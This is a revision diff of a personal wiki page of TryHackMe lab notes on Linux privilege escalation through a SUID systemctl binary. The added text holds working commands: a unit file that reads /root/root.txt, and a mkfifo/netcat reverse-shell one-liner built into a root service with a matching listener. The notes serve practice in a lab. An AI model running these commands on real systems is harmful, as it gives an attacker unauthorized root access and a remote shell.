The gMan nixWiki

Because the mind is made of Teflon...

User Tools

Site Tools

You are here: start » prac_app_tryhackme
prac_app_tryhackme

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
prac_app_tryhackme [2022/09/24 18:51] gmanprac_app_tryhackme [2022/09/24 19:03] (current) gman
Line 61: Line 61:
 </code>  </code> 
  
-Then execute the .phtml file on the target machine: +  * Then execute the .phtml file on the target machine: 
  
 <code>http:[IP]:3333/internal/uploads</code> <code>http:[IP]:3333/internal/uploads</code>
Line 81: Line 81:
  
 **Discovered Vulnerability:** [[https://gtfobins.github.io/gtfobins/systemctl/ | systemctl is SUID root]] **Discovered Vulnerability:** [[https://gtfobins.github.io/gtfobins/systemctl/ | systemctl is SUID root]]
 +
 +===== Exploit =====
  
 [[https://n0w4n.nl/vulnversity/ | n0w4n]]: He said we did not have perms to write in the default systemctl dir, so he created the unit file as an ENVIRONMENT VARIABLE. [[https://n0w4n.nl/vulnversity/ | n0w4n]]: He said we did not have perms to write in the default systemctl dir, so he created the unit file as an ENVIRONMENT VARIABLE.
  
-  * First we create a variable which holds a unique file (on target machine). +  * First we create a variable which holds a unique file (on target machine). 
-<code>+
  
-</code> +<code>eop=$(mktemp).service</code>
-  * Then we create an unit file and write it into the variable. +
-<code>+
  
-</code> +  Then we create an unit file and write it into the variable. Inside the unit file we enter a command that will let the shell execute the command ''cat'' and redirect the output of ''cat'' to a file called ''output'' in the folder ''/tmp/''.
-   Inside the unit file we entered a command which will let shell execute the command cat and redirect the output of cat to a file called output in the folder tmp. +
-<code>+
  
 +<code>
 +echo '[Service]
 +> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
 +> [Install]
 +> WantedBy=multi-user.target' > $eop
 </code> </code>
 +
   * And finally we use the /bin/systemctl program to enable the unit file.   * And finally we use the /bin/systemctl program to enable the unit file.
 +
 <code> <code>
 +/bin/systemctl link $eop
 +# Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
  
 +/bin/systemctl enable --now $eop
 +# Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
 </code> </code>
 +
   * Find it:   * Find it:
-<code> 
  
-</code>+<code>ls -lah /tmp</code> 
 + 
 +===== Alternative Exploit =====
  
 **To get a reverse root shell:** **To get a reverse root shell:**
  
-  Create your unit file:+**NOTE:** the target machine is using netcat OpenBSD, NOT the traditional netcat. That means the -e (execute) flag will not work. See **Netcat (Traditional)** and **Netcat (OpenBSD)" (OpenBSD netcat removed the -e flag “for security” ([[https://kb.systemoverlord.com/security/postex/reverse/ | link]]). 
 <code> <code>
 +# nc (openbsd):
 +rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f
 +</code>
  
 +  * Create your unit file:
 +
 +<code>
 +echo '[Service]
 +Type=oneshot
 +ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f"
 +[Install]
 +WantedBy=multi-user.target' > gk.service
 </code> </code>
 +
   * Open a listener on your attack machine:   * Open a listener on your attack machine:
-<code> 
  
-</code>+<code>nc -lvnp 7777</code> 
   * Link and start the service:   * Link and start the service:
-<code> 
  
 +<code>
 +/bin/systemctl link /tmp/gk.service         # need the full path
 +/bin/systemctl enable --now /tmp/gk.service
 </code> </code>
  
prac_app_tryhackme.1664045489.txt.gz · Last modified: by gman